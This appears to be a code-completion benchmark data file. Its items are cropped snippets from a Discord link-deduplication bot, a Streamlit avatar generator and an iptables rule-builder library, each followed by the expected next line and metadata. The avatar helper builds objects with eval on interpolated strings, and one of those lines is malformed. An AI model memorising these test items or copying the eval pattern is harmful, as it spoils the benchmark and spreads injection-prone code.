dead_sites_channel = self.bot.get_channel(988133247575810059)
if dead_sites_channel:
self.dead_sites_messages = set(await dead_sites_channel.history(limit=None).flatten())
deleted_sites_channel = self.bot.get_channel(986617857133649921)
if deleted_sites_channel:
self.deleted_sites_messages = set(
await deleted_sites_channel.history(limit=None).flatten()
)
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.channel.id in auto_thread_channels and any(
str(role) in message.content for role in auto_thread_roles
):
await message.create_thread(
name="Auto-Thread - Please keep discussions in here!",
reason="Auto thread created by FMHY Bot")
if message.author.bot:
return
if message.channel.id in channel_ids:
message_links = set(re.findall(url_regex, message.content))
if message_links:
(
duplicate_links,
non_duplicate_links,
) = await self.get_duplicate_non_duplicate_links(message_links)
# One link, duplicate
if len(message_links) == 1 and len(duplicate_links) == 1:
reply_message = await message.reply("**This link is already in the wiki!**")
await reply_message.add_reaction("❌")
return
# All links, duplicates
elif len(message_links) > 1 and len(message_links) == len(duplicate_links):
reply_message = await message.reply(
"**All of these links are already in the wiki!**"
)
await reply_message.add_reaction("❌")
return
# Partial duplicates
elif len(message_links) > 1 and len(duplicate_links) >= 1:
non_duplicate_links_string = "\n".join(
[f"{protocol}://{link}" for protocol,
link in non_duplicate_links]
)
non_duplicate_links_embed = cembed(
title="__Non-Duplicate Links:__",
description=f"{non_duplicate_links_string}",
)
non_duplicate_links_embed.set_author(
name=message.author.name,
icon_url=message.author.display_avatar,
)
reply_message = await message.reply(embed=non_duplicate_links_embed)
await reply_message.add_reaction("❌")
return
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
emoji = payload.emoji
chan_id = payload.channel_id
msg_id = payload.message_id
channel = await self.bot.fetch_channel(chan_id)
msg: discord.Message = await channel.fetch_message(msg_id)
user = await self.bot.fetch_user(payload.user_id)
if not isinstance(channel, discord.DMChannel):
# Bookmark message
if emoji == self.bookmark_emoji:
attachments = msg.attachments
embed = discord.Embed(color=0x2B2D31, timestamp=datetime.now())
embed.set_author(name=msg.author.name,
icon_url=msg.author.display_avatar)
embed.description = msg.content[:4096]
embed.add_field(
name="Jump", value=f"[Go to Message!]({msg.jump_url})")
embed.set_footer(
text=f"Guild: {channel.guild.name} | Channel: #{channel.name}")
attach = ""
if attachments:
img_added = False
for attachment in attachments:
if img_added is False:
if attachment.content_type in [
"image/avif",
"image/jpeg",
"image/png",
]:
try:
embed.set_image(url=attachment.url)
except:
pass
img_added = True
attach += f"{attachment.url}\n"
try:
sent = await user.send(content=f"\n{attach}", embed=embed)
await sent.add_reaction("❌")
except discord.Forbidden:
await channel.send(
f"**{user.mention} I do not have permission to DM you. Please enable DMs for this server.**"
)
# Delete message if user has roles that can manage messages
if (
emoji == self.del_emoji
and msg.author.id == self.bot.user.id
and payload.user_id != self.bot.user.id
):
for role in payload.member.roles:
|
class EventHandling(commands.Cog):
"""EventHandling commands"""
def __init__(self, bot: Bot):
self.bot = bot
self.bookmark_emoji = discord.PartialEmoji(name="🔖")
self.del_emoji = discord.PartialEmoji(name="❌")
self.last_single_page_update = 0
self.single_page = ""
self.dead_sites_messages = set()
self.deleted_sites_messages = set()
@tasks.loop(minutes=5)
async def update_single_page(self):
async with self.bot.session.get(
"https://raw.githubusercontent.com/fmhy/FMHYedit/main/single-page"
) as response:
self.single_page = await response.text()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
async def get_duplicate_non_duplicate_links(self, message_links):
if time.time() - self.last_single_page_update >= 300:
await self.update_single_page()
wiki_links = set(
re.findall(
url_regex,
self.single_page,
)
)
duplicate_links = wiki_links.intersection(message_links)
non_duplicate_links = message_links - duplicate_links
return duplicate_links, non_duplicate_links
@commands.Cog.listener()
async def on_ready(self):
self.update_single_page.start()
dead_sites_channel = self.bot.get_channel(988133247575810059)
if dead_sites_channel:
self.dead_sites_messages = set(await dead_sites_channel.history(limit=None).flatten())
deleted_sites_channel = self.bot.get_channel(986617857133649921)
if deleted_sites_channel:
self.deleted_sites_messages = set(
await deleted_sites_channel.history(limit=None).flatten()
)
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.channel.id in auto_thread_channels and any(
str(role) in message.content for role in auto_thread_roles
):
await message.create_thread(
name="Auto-Thread - Please keep discussions in here!",
reason="Auto thread created by FMHY Bot")
if message.author.bot:
return
if message.channel.id in channel_ids:
message_links = set(re.findall(url_regex, message.content))
if message_links:
(
duplicate_links,
non_duplicate_links,
) = await self.get_duplicate_non_duplicate_links(message_links)
# One link, duplicate
if len(message_links) == 1 and len(duplicate_links) == 1:
reply_message = await message.reply("**This link is already in the wiki!**")
await reply_message.add_reaction("❌")
return
# All links, duplicates
elif len(message_links) > 1 and len(message_links) == len(duplicate_links):
reply_message = await message.reply(
"**All of these links are already in the wiki!**"
)
await reply_message.add_reaction("❌")
return
# Partial duplicates
elif len(message_links) > 1 and len(duplicate_links) >= 1:
non_duplicate_links_string = "\n".join(
[f"{protocol}://{link}" for protocol,
link in non_duplicate_links]
)
non_duplicate_links_embed = cembed(
title="__Non-Duplicate Links:__",
description=f"{non_duplicate_links_string}",
)
non_duplicate_links_embed.set_author(
name=message.author.name,
icon_url=message.author.display_avatar,
)
reply_message = await message.reply(embed=non_duplicate_links_embed)
await reply_message.add_reaction("❌")
return
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
emoji = payload.emoji
chan_id = payload.channel_id
msg_id = payload.message_id
channel = await self.bot.fetch_channel(chan_id)
msg: discord.Message = await channel.fetch_message(msg_id)
user = await self.bot.fetch_user(payload.user_id)
if not isinstance(channel, discord.DMChannel):
# Bookmark message
if emoji == self.bookmark_emoji:
attachments = msg.attachments
embed = discord.Embed(color=0x2B2D31, timestamp=datetime.now())
embed.set_author(name=msg.author.name,
icon_url=msg.author.display_avatar)
embed.description = msg.content[:4096]
embed.add_field(
name="Jump", value=f"[Go to Message!]({msg.jump_url})")
embed.set_footer(
text=f"Guild: {channel.guild.name} | Channel: #{channel.name}")
attach = ""
if attachments:
img_added = False
for attachment in attachments:
if img_added is False:
if attachment.content_type in [
"image/avif",
"image/jpeg",
"image/png",
]:
try:
embed.set_image(url=attachment.url)
except:
pass
img_added = True
attach += f"{attachment.url}\n"
try:
sent = await user.send(content=f"\n{attach}", embed=embed)
await sent.add_reaction("❌")
except discord.Forbidden:
await channel.send(
f"**{user.mention} I do not have permission to DM you. Please enable DMs for this server.**"
)
# Delete message if user has roles that can manage messages
if (
emoji == self.del_emoji
and msg.author.id == self.bot.user.id
and payload.user_id != self.bot.user.id
):
for role in payload.member.roles: | if role.id in managing_roles: | 0 | 2023-12-19 10:27:04+00:00 | 4k |
morikeli/persona | main.py | [
{
"identifier": "facial_expression",
"path": "features/person/faces/expressions/facial_expression.py",
"snippet": "FACIAL_EXPRESSIONS = [\n 'DEFAULT',\n 'ANGRY',\n 'ANGRY_NATURAL',\n 'DEFAULT_NATURAL',\n 'FLAT_NATURAL',\n 'FROWN_NATURAL',\n 'RAISED_EXCITED',\n 'RAISED_EXCITED_NATURAL',\n 'SAD_CONCERNED',\n 'SAD_CONCERNED_NATURAL',\n 'UNI_BROW_NATURAL',\n 'UP_DOWN',\n 'UP_DOWN_NATURAL',\n]\nFACIAL_EXPRESSIONS_MOUTH = [\n 'DEFAULT',\n 'CONCERNED',\n 'DISBELIEF',\n 'EATING',\n 'GRIMACE',\n 'SAD',\n 'SCREAM_OPEN',\n 'SERIOUS',\n 'SMILE',\n 'TONGUE',\n 'TWINKLE',\n 'VOMIT',\n]"
},
{
"identifier": "add_ons",
"path": "features/fashion/accessories/add_ons.py",
"snippet": "FASHION_ACCESSORIES = [\n 'DEFAULT',\n 'KURT',\n 'PRESCRIPTION_01',\n 'PRESCRIPTION_02',\n 'ROUND',\n 'SUNGLASSES',\n 'WAYFARERS',\n]"
},
{
"identifier": "clothes",
"path": "features/fashion/clothing/clothes.py",
"snippet": "CLOTHES_CATEGORIES = [\n 'BLAZER_SHIRT',\n 'BLAZER_SWEATER',\n 'COLLAR_SWEATER',\n 'GRAPHIC_SHIRT',\n 'HOODIE',\n 'OVERALL',\n 'SHIRT_CREW_NECK',\n 'SHIRT_SCOOP_NECK',\n 'SHIRT_V_NECK',\n]\nCLOTHES_COLOR = [\n 'BLACK',\n 'BLUE_01',\n 'BLUE_02',\n 'BLUE_03',\n 'GRAY_01',\n 'GRAY_02',\n 'HEATHER',\n 'PASTEL_BLUE',\n 'PASTEL_GREEN',\n 'PASTEL_ORANGE',\n 'PASTEL_RED',\n 'PASTEL_YELLOW',\n 'PINK',\n 'RED',\n 'WHITE',\n]\nCLOTHES_GRAPHICS = [\n 'BAT',\n 'BEAR',\n 'CUMBIA',\n 'DEER',\n 'DIAMOND',\n 'HOLA',\n 'PIZZA',\n 'RESIST',\n 'SELENA',\n 'SKULL',\n 'SKULL_OUTLINE',\n]"
},
{
"identifier": "hats",
"path": "features/fashion/clothing/hats.py",
"snippet": "HEADWEAR = [\n 'EYE_PATCH',\n 'HAT',\n 'HIJAB',\n 'TURBAN',\n 'WINTER_HAT1',\n 'WINTER_HAT2',\n 'WINTER_HAT3',\n 'WINTER_HAT4',\n]\nHAT_COLOR = [\n 'BLACK',\n 'BLUE_01',\n 'BLUE_02',\n 'BLUE_03',\n 'GRAY_01',\n 'GRAY_02',\n 'HEATHER',\n 'PASTEL_BLUE',\n 'PASTEL_GREEN',\n 'PASTEL_ORANGE',\n 'PASTEL_RED',\n 'PASTEL_YELLOW',\n 'PINK',\n 'RED',\n 'WHITE',\n\n]"
},
{
"identifier": "beard",
"path": "features/fashion/hairstyles/beard.py",
"snippet": "BEARD = [\n 'DEFAULT',\n 'BEARD_MEDIUM',\n 'BEARD_LIGHT',\n 'BEARD_MAJESTIC',\n 'MOUSTACHE_FANCY',\n 'MOUSTACHE_MAGNUM',\n]\nBEARD_COLOR = [\n 'AUBURN',\n 'BLACK',\n 'BLONDE',\n 'BLONDE_GOLDEN',\n 'BROWN',\n 'BROWN_DARK',\n 'PASTEL_PINK',\n 'PLATINUM',\n 'RED',\n 'SILVER_GRAY',\n]"
},
{
"identifier": "hair",
"path": "features/fashion/hairstyles/hair.py",
"snippet": "HAIR_COLOR = [\n 'AUBURN',\n 'BLACK',\n 'BLONDE',\n 'BLONDE_GOLDEN',\n 'BROWN',\n 'BROWN_DARK',\n 'PASTEL_PINK',\n 'PLATINUM',\n 'RED',\n 'SILVER_GRAY',\n]\nHAIR_STYLES = [\n 'NO_HAIR',\n 'LONG_HAIR_BIG_HAIR',\n 'LONG_HAIR_BOB',\n 'LONG_HAIR_BUN',\n 'LONG_HAIR_CURLY',\n 'LONG_HAIR_CURVY',\n 'LONG_HAIR_DREADS',\n 'LONG_HAIR_FRIDA',\n 'LONG_HAIR_FRO',\n 'LONG_HAIR_FRO_BAND',\n 'LONG_HAIR_NOT_TOO_LONG',\n 'LONG_HAIR_SHAVED_SIDES',\n 'LONG_HAIR_MIA_WALLACE',\n 'LONG_HAIR_STRAIGHT',\n 'LONG_HAIR_STRAIGHT2',\n 'LONG_HAIR_STRAIGHT_STRAND',\n 'SHORT_HAIR_DREADS_01',\n 'SHORT_HAIR_DREADS_02',\n 'SHORT_HAIR_FRIZZLE',\n 'SHORT_HAIR_SHAGGY_MULLET',\n 'SHORT_HAIR_SHORT_CURLY',\n 'SHORT_HAIR_SHORT_FLAT',\n 'SHORT_HAIR_SHORT_ROUND',\n 'SHORT_HAIR_SHORT_WAVED',\n 'SHORT_HAIR_SIDES',\n 'SHORT_HAIR_THE_CAESAR',\n 'SHORT_HAIR_THE_CAESAR_SIDE_PART',\n]"
},
{
"identifier": "skins",
"path": "features/person/complexion/skins.py",
"snippet": "SKIN_COLOR = [\n 'BLACK',\n 'BROWN',\n 'DARK_BROWN',\n 'LIGHT',\n 'PALE',\n 'TANNED',\n 'YELLOW',\n \n]"
},
{
"identifier": "face",
"path": "features/person/faces/face.py",
"snippet": "EYES = [\n 'DEFAULT',\n 'CLOSE',\n 'CRY',\n 'DIZZY',\n 'EYE_ROLL',\n 'HAPPY',\n 'HEARTS',\n 'SIDE',\n 'SQUINT',\n 'SURPRISED',\n 'WINK',\n 'WINK_WACKY',\n]"
},
{
"identifier": "random_avatar",
"path": "avatar/avatar.py",
"snippet": "def random_avatar():\n \"\"\" This is a function that automatically generates an avatar using random avatar features. \"\"\"\n\n features = {\n 'accessories': randrange(0, len(add_ons.FASHION_ACCESSORIES)),\n 'background': randrange(0, len(['CIRCLE', 'TRANSPARENT'])),\n 'beard': randrange(0, len(beard.BEARD)),\n 'beard_color': randrange(0, len(beard.BEARD_COLOR)),\n 'clothing': randrange(0, len(clothes.CLOTHES_CATEGORIES)),\n 'clothes_color': randrange(0, len(clothes.CLOTHES_COLOR)),\n 'clothes_art': randrange(0, len(clothes.CLOTHES_GRAPHICS)),\n 'eyes': randrange(0, len(face.EYES)),\n 'face_expression': randrange(0, len(facial_expression.FACIAL_EXPRESSIONS)),\n 'hair': randrange(0, len(hair.HAIR_STYLES)),\n 'headwear': randrange(0, len(hats.HEADWEAR)),\n 'hair_and_headwear': randrange(0, len(hair.HAIR_STYLES + hats.HEADWEAR)),\n 'hair_color': randrange(0, len(hair.HAIR_COLOR)),\n 'hat_color': randrange(0, len(hats.HAT_COLOR)),\n 'mouth': randrange(0, len(facial_expression.FACIAL_EXPRESSIONS_MOUTH)),\n 'skin': randrange(0, len(skins.SKIN_COLOR)),\n }\n\n return features"
},
{
"identifier": "custom_avatar",
"path": "avatar/avatar.py",
"snippet": "def custom_avatar(features):\n \"\"\" This is a function that generates an avatar depending on the user's input. \"\"\"\n\n avatar = pa.PyAvataaar(\n accessories_type=eval(f'pa.AccessoriesType.{features[\"accessories\"]}'),\n clothe_type=eval(f'pa.ClotheType.{features[\"clothing\"]}'),\n clothe_color=eval(f'pa.Color.{features[\"clothes_color\"]}'),\n clothe_graphic_type=eval(f'pa.ClotheGraphicType.{features[\"clothes_art\"]}'),\n eye_type=eval(f'pa.EyesType.{features[\"eyes\"]}'),\n eyebrow_type=eval(f'pa.EyebrowType.{features[\"face_expression\"]}'),\n hair_color=eval(f'pa.HairColor.{features[\"hair_color\"]}'),\n hat_color=eval(f'pa.Color.{features[\"hat_color\"]}'),\n facial_hair_type=eval(f'pa.FacialHairType.{features[\"beard\"]}'),\n facial_hair_color=eval(f'pa.HairColor.{features[\"beard_color\"]}'),\n mouth_type=eval(f'pa.MouthType.{features[\"mouth\"]}'),\n skin_color=eval(f'pa.SkinColor.{features[\"skin\"]}'),\n style=eval(f'pa.AvatarStyle.{features[\"bg\"]}'),\n top_type=eval(f'pa.TopType.SHORT_HAIR_SHORT_FLAT.{features[\"hair_and_headwear\"]}'),\n\n )\n\n render_img = avatar.render_png_file(IMAGE_FILE)\n image = Image.open(IMAGE_FILE)\n\n return update_avatar_image(image)"
},
{
"identifier": "christmas_festive_animation",
"path": "animations/utils.py",
"snippet": "def christmas_festive_animation():\n \"\"\" Display snowflakes animaton during Christmas festive season. \"\"\"\n \n current_year = dt.now().date()\n previous_year = dt.today().year - 1\n current_festive_date = dt(year=previous_year, month=12, day=20).date()\n date_diff = current_year - current_festive_date\n\n if (date_diff.days >= 0) and (date_diff.days <= 21):\n return st.snow()"
},
{
"identifier": "download_avatar",
"path": "images/image.py",
"snippet": "def download_avatar(avatar_image):\n \"\"\" This function allows one to download their avatars.\"\"\"\n\n with open(avatar_image, 'rb') as image_file:\n st.download_button(\n label='Download avatar',\n type=\"primary\",\n data=image_file,\n file_name=avatar_image,\n use_container_width=True\n )\n \n return image_file"
}
] | from features.person.faces.expressions import facial_expression as fe
from features.fashion.accessories import add_ons
from features.fashion.clothing import clothes, hats
from features.fashion.hairstyles import beard, hair
from features.person.complexion import skins
from features.person.faces import face
from avatar.avatar import random_avatar, custom_avatar
from animations.utils import christmas_festive_animation
from images.image import download_avatar
import streamlit as st | 3,132 |
# webpage configuration
st.set_page_config(page_title='Persona', page_icon=':busts_in_silhouette:', layout='centered')
with open('static/css/styles.css') as stylesheet:
st.markdown(f'<style>{stylesheet.read()}</style>', unsafe_allow_html=True)
def main(features_indices: dict = None):
""" This is the main function that uses streamlit to create a dynamic web page. """
# navigation tabs
tabs = st.tabs(['Beard & Hair', 'Facial features', 'Fashion trends', 'Color', 'Background style'])
st.divider()
# "Generate random avatar" & "Download button" buttons column
cols_btn = st.columns([6, 6])
with cols_btn[1]:
download_btn = download_avatar()
if download_btn: # display download button by default
# download_avatar()
st.balloons()
if cols_btn[0].button('Generate random avatar', use_container_width=True):
features_indices = random_avatar()
with tabs[0]:
st.caption('Add beard, hairstyle or hair cut')
avatar_hair = st.selectbox(
label=':haircut: Hair',
options=hair.HAIR_STYLES,
index=features_indices["hair"] if features_indices else 0,
)
avatar_beard = st.selectbox(
label=':bearded_person: Beard',
options=beard.BEARD,
index=features_indices["beard"] if features_indices else 0,
)
with tabs[1]:
st.caption('Add eyes or facial expression.')
avatar_eyes = st.selectbox(
label=':eyes: Eyes',
options=face.EYES,
index=features_indices["eyes"] if features_indices else 0,
)
avatar_facial_expr = st.selectbox(
label=':smiley: Facial expression',
options=fe.FACIAL_EXPRESSIONS,
index=features_indices["face_expression"] if features_indices else 0,
)
avatar_mouth = st.selectbox(
label=':lips: Mouth',
options=fe.FACIAL_EXPRESSIONS_MOUTH,
index=features_indices["mouth"] if features_indices else 0,
)
with tabs[2]:
st.caption("What are your favorite fashion trends?")
tabs_cols = st.columns([6, 6])
avatar_addons = tabs_cols[0].selectbox(
label=':sunglasses: Accessories',
options=add_ons.FASHION_ACCESSORIES,
index=features_indices["accessories"] if features_indices else 0,
)
avatar_clothe = tabs_cols[0].selectbox(
label=':tshirt: Clothes',
|
# webpage configuration
st.set_page_config(page_title='Persona', page_icon=':busts_in_silhouette:', layout='centered')
with open('static/css/styles.css') as stylesheet:
st.markdown(f'<style>{stylesheet.read()}</style>', unsafe_allow_html=True)
def main(features_indices: dict = None):
""" This is the main function that uses streamlit to create a dynamic web page. """
# navigation tabs
tabs = st.tabs(['Beard & Hair', 'Facial features', 'Fashion trends', 'Color', 'Background style'])
st.divider()
# "Generate random avatar" & "Download button" buttons column
cols_btn = st.columns([6, 6])
with cols_btn[1]:
download_btn = download_avatar()
if download_btn: # display download button by default
# download_avatar()
st.balloons()
if cols_btn[0].button('Generate random avatar', use_container_width=True):
features_indices = random_avatar()
with tabs[0]:
st.caption('Add beard, hairstyle or hair cut')
avatar_hair = st.selectbox(
label=':haircut: Hair',
options=hair.HAIR_STYLES,
index=features_indices["hair"] if features_indices else 0,
)
avatar_beard = st.selectbox(
label=':bearded_person: Beard',
options=beard.BEARD,
index=features_indices["beard"] if features_indices else 0,
)
with tabs[1]:
st.caption('Add eyes or facial expression.')
avatar_eyes = st.selectbox(
label=':eyes: Eyes',
options=face.EYES,
index=features_indices["eyes"] if features_indices else 0,
)
avatar_facial_expr = st.selectbox(
label=':smiley: Facial expression',
options=fe.FACIAL_EXPRESSIONS,
index=features_indices["face_expression"] if features_indices else 0,
)
avatar_mouth = st.selectbox(
label=':lips: Mouth',
options=fe.FACIAL_EXPRESSIONS_MOUTH,
index=features_indices["mouth"] if features_indices else 0,
)
with tabs[2]:
st.caption("What are your favorite fashion trends?")
tabs_cols = st.columns([6, 6])
avatar_addons = tabs_cols[0].selectbox(
label=':sunglasses: Accessories',
options=add_ons.FASHION_ACCESSORIES,
index=features_indices["accessories"] if features_indices else 0,
)
avatar_clothe = tabs_cols[0].selectbox(
label=':tshirt: Clothes', | options=clothes.CLOTHES_CATEGORIES, | 2 | 2023-12-19 09:39:04+00:00 | 4k |
JonatanNevo/better-iptables | iptables/iptables.py | [
{
"identifier": "ConnbytesDirection",
"path": "iptables/enums.py",
"snippet": "class ConnbytesDirection(str, Enum):\n ORIGINAL = \"original\"\n REPLY = \"reply\"\n BOTH = \"both\""
},
{
"identifier": "ConnbytesMode",
"path": "iptables/enums.py",
"snippet": "class ConnbytesMode(str, Enum):\n BYTES = \"bytes\"\n PACKETS = \"packets\"\n AVGERAGE = \"avgpkt\""
},
{
"identifier": "ConntrackStates",
"path": "iptables/enums.py",
"snippet": "class ConntrackStates(str, Enum):\n INVALID = \"INVALID\"\n ESTABLISHED = \"ESTABLISHED\"\n RELATED = \"RELATED\"\n UNTRACKED = \"UNTRACKED\"\n SNAT = \"SNAT\"\n DNAT = \"DNAT\"\n NEW = \"NEW\""
},
{
"identifier": "ConntrackStatus",
"path": "iptables/enums.py",
"snippet": "class ConntrackStatus(str, Enum):\n NONE = \"NONE\"\n EXPECTED = \"EXPECTED\"\n SEEN_REPLY = \"SEEN_REPLY\"\n ASSURED = \"ASSURED\"\n CONFIRMED = \"CONFIRMED\""
},
{
"identifier": "ConntrackDirection",
"path": "iptables/enums.py",
"snippet": "class ConntrackDirection(str, Enum):\n ORIGINAL = \"original\"\n REPLY = \"reply\""
},
{
"identifier": "LimitUnits",
"path": "iptables/enums.py",
"snippet": "class LimitUnits(str, Enum):\n SECOND = \"second\"\n MINUTE = \"minute\"\n HOUR = \"hour\"\n DAY = \"day\""
},
{
"identifier": "State",
"path": "iptables/enums.py",
"snippet": "class State(str, Enum):\n INVALID = \"INVALID\"\n ESTABLISHED = \"ESTABLISHED\"\n NEW = \"NEW\"\n RELATED = \"RELATED\"\n UNTRACKED = \"UNTRACKED\""
},
{
"identifier": "TcpFlags",
"path": "iptables/enums.py",
"snippet": "class TcpFlags(str, Enum):\n SYN = \"SYN\"\n ACK = \"ACK\"\n FIN = \"FIN\"\n RST = \"RST\"\n URG = \"URG\"\n PSH = \"PSH\"\n ALL = \"ALL\"\n NONE = \"NONE\""
},
{
"identifier": "Targets",
"path": "iptables/enums.py",
"snippet": "class Targets(str, Enum):\n ACCEPT = \"ACCEPT\"\n DROP = \"DROP\"\n RETURN = \"RETURN\"\n AUDIT = \"AUDIT\"\n CHECKSUM = \"CHECKSUM\"\n CLASSIFY = \"CLASSIFY\"\n CLUSTERIP = \"CLUSTERIP\"\n CONNMARK = \"CONNMARK\"\n CONNSECMARK = \"CONNSECMARK\"\n CT = \"CT\"\n DNAT = \"DNAT\"\n DNPT = \"DNPT\"\n DSCP = \"DSCP\"\n ECN = \"ECN\"\n HL = \"HL\"\n HMARK = \"HMARK\"\n IDLETIMER = \"IDLETIMER\"\n LED = \"LED\"\n LOG = \"LOG\"\n MARK = \"MARK\"\n MASQUERADE = \"MASQUERADE\"\n NETMAP = \"NETMAP\"\n NFLOG = \"NFLOG\"\n NFQUEUE = \"NFQUEUE\"\n NOTRACK = \"NOTRACK\"\n RATEEST = \"RATEEST\"\n REDIRECT = \"REDIRECT\"\n REJECT = \"REJECT\"\n SECMARK = \"SECMARK\"\n SET = \"SET\"\n SNAT = \"SNAT\"\n SNPT = \"SNPT\"\n SYNPROXY = \"SYNPROXY\"\n TCPMSS = \"TCPMSS\"\n TCPOPTSTRIP = \"TCPOPTSTRIP\"\n TEE = \"TEE\"\n TOS = \"TOS\"\n TPROXY = \"TPROXY\"\n TRACE = \"TRACE\"\n TTL = \"TTL\"\n ULOG = \"ULOG\""
},
{
"identifier": "Protocols",
"path": "iptables/enums.py",
"snippet": "class Protocols(str, Enum):\n TCP = \"tcp\"\n UDP = \"udp\"\n ICMP = \"icmp\"\n ALL = \"all\""
},
{
"identifier": "Tables",
"path": "iptables/enums.py",
"snippet": "class Tables(str, Enum):\n FILTER = \"filter\"\n NAT = \"nat\"\n MANGLE = \"mangle\"\n RAW = \"raw\"\n SECURITY = \"security\""
},
{
"identifier": "Chains",
"path": "iptables/enums.py",
"snippet": "class Chains(str, Enum):\n INPUT = \"INPUT\"\n FORWARD = \"FORWARD\"\n OUTPUT = \"OUTPUT\"\n PREROUTING = \"PREROUTING\"\n POSTROUTING = \"POSTROUTING\""
},
{
"identifier": "Actions",
"path": "iptables/enums.py",
"snippet": "class Actions(str, Enum):\n APPEND = \"-A\"\n DELETE = \"-D\"\n INSERT = \"-I\"\n REPLACE = \"-R\"\n CHECK = \"-C\"\n LIST = \"-L\"\n FLUSH = \"-F\"\n ZERO = \"-Z\"\n NEW_CHAIN = \"-N\"\n DELETE_CHAIN = \"-X\"\n RENAME_CHAIN = \"-E\"\n POLICY = \"-P\"\n LIST_RULES = \"-S\""
},
{
"identifier": "RejectType",
"path": "iptables/enums.py",
"snippet": "class RejectType(str, Enum):\n ICMP_NET_UNREACHABLE = \"icmp-net-unreachable\"\n ICMP_HOST_UNREACHABLE = \"icmp-host-unreachable\"\n ICMP_PORT_UNREACHABLE = \"icmp-port-unreachable\"\n ICMP_PROT_UNREACHABLE = \"icmp-proto-unreachable\"\n ICMP_NET_PROHIBITED = \"icmp-net-prohibited\"\n ICMP_HOST_PROHIBITED = \"icmp-host-prohibited\"\n ICMP_ADMIN_PROHIBITED = \"icmp-admin-prohibited\"\n TCP_RESET = \"tcp-reset\"\n ICMP6_NO_ROUTE = \"icmp6-no-route\"\n NO_ROUTE = \"no-route\"\n ICMP6_ADM_PROHIBITED = \"icmp6-adm-prohibited\"\n ADM_PROHIBITED = \"adm-prohibited\"\n ICMP6_ADDR_UNREACHABLE = \"icmp6-addr-unreachable\"\n ADDR_UNREACHABLE = \"addr-unreach\"\n ICMP6_PORT_UNREACHABLE = \"icmp6-port-unreachable\""
},
{
"identifier": "IPTablesError",
"path": "iptables/exceptions.py",
"snippet": "class IPTablesError(Exception):\n pass"
},
{
"identifier": "IPVersionError",
"path": "iptables/exceptions.py",
"snippet": "class IPVersionError(IPTablesError):\n def __init__(self):\n super().__init__(\"ipv4 and ipv6 cannot be both True\")"
},
{
"identifier": "ConnbytesError",
"path": "iptables/exceptions.py",
"snippet": "class ConnbytesError(IPTablesError):\n def __init__(self):\n super().__init__(\"connbytes must be in the format of 'bytes:bytes'\")"
},
{
"identifier": "ConnlimitAddrError",
"path": "iptables/exceptions.py",
"snippet": "class ConnlimitAddrError(IPTablesError):\n def __init__(self):\n super().__init__(\"saddr and daddr cannot be both True\")"
},
{
"identifier": "MultiportSourceAndDestinationError",
"path": "iptables/exceptions.py",
"snippet": "class MultiportSourceAndDestinationError(IPTablesError):\n def __init__(self):\n super().__init__(\"source_ports and destination_ports cannot be both True\")"
},
{
"identifier": "MultiportPortsAndOtherError",
"path": "iptables/exceptions.py",
"snippet": "class MultiportPortsAndOtherError(IPTablesError):\n def __init__(self):\n super().__init__(\"ports cannot be used with source_ports or destination_ports\")"
},
{
"identifier": "MultiportFormatError",
"path": "iptables/exceptions.py",
"snippet": "class MultiportFormatError(IPTablesError):\n def __init__(self):\n super().__init__(\"ports must be an int or a string in format of 'port:port'\")"
}
] | import dataclasses
import re
from enum import Enum
from typing import Optional, Union, List, Tuple
from typing_extensions import Self
from iptables.enums import ConnbytesDirection, ConnbytesMode, ConntrackStates, ConntrackStatus, ConntrackDirection, \
LimitUnits, State, TcpFlags, Targets, Protocols, Tables, Chains, Actions, RejectType
from iptables.exceptions import IPTablesError, IPVersionError, ConnbytesError, ConnlimitAddrError, \
MultiportSourceAndDestinationError, MultiportPortsAndOtherError, MultiportFormatError | 2,105 |
@dataclasses.dataclass(frozen=True)
class Module:
module: str
parameters: List[Tuple[str, str]] = dataclasses.field(default_factory=list)
def build(self) -> str:
parameters = []
for argument, value in self.parameters:
if value:
parameters.append(f"--{argument} {value}")
else:
parameters.append(f"--{argument}")
return f"-m {self.module} {' '.join(parameters)}"
@dataclasses.dataclass(frozen=True)
class Flags:
ipv4: bool = True
ipv6: bool = False
fragment: bool = False
lock: bool = False # same as --wait
verbose: bool = False
resolve: bool = True # same as --numeric
exact: bool = False
def __post_init__(self) -> None:
if self.ipv4 and self.ipv6:
raise IPVersionError
def build(self) -> str:
flags = []
if self.fragment:
flags.append("-f")
if self.ipv4:
flags.append("-4")
elif self.ipv6:
flags.append("-6")
if self.lock:
flags.append("-w")
if self.verbose:
flags.append("-v")
if not self.resolve:
flags.append("-n")
if self.exact:
flags.append("-x")
return " ".join(flags)
def __str__(self) -> str:
return self.build()
@dataclasses.dataclass(frozen=True)
class Matches:
# TODO: add set-counters
|
@dataclasses.dataclass(frozen=True)
class Module:
module: str
parameters: List[Tuple[str, str]] = dataclasses.field(default_factory=list)
def build(self) -> str:
parameters = []
for argument, value in self.parameters:
if value:
parameters.append(f"--{argument} {value}")
else:
parameters.append(f"--{argument}")
return f"-m {self.module} {' '.join(parameters)}"
@dataclasses.dataclass(frozen=True)
class Flags:
ipv4: bool = True
ipv6: bool = False
fragment: bool = False
lock: bool = False # same as --wait
verbose: bool = False
resolve: bool = True # same as --numeric
exact: bool = False
def __post_init__(self) -> None:
if self.ipv4 and self.ipv6:
raise IPVersionError
def build(self) -> str:
flags = []
if self.fragment:
flags.append("-f")
if self.ipv4:
flags.append("-4")
elif self.ipv6:
flags.append("-6")
if self.lock:
flags.append("-w")
if self.verbose:
flags.append("-v")
if not self.resolve:
flags.append("-n")
if self.exact:
flags.append("-x")
return " ".join(flags)
def __str__(self) -> str:
return self.build()
@dataclasses.dataclass(frozen=True)
class Matches:
# TODO: add set-counters | protocol: Optional[Protocols] = None | 9 | 2023-12-17 17:00:49+00:00 | 4k |
cvlab-yonsei/RankMixup | tools/test_net.py | [
{
"identifier": "Tester",
"path": "calibrate/engine/tester.py",
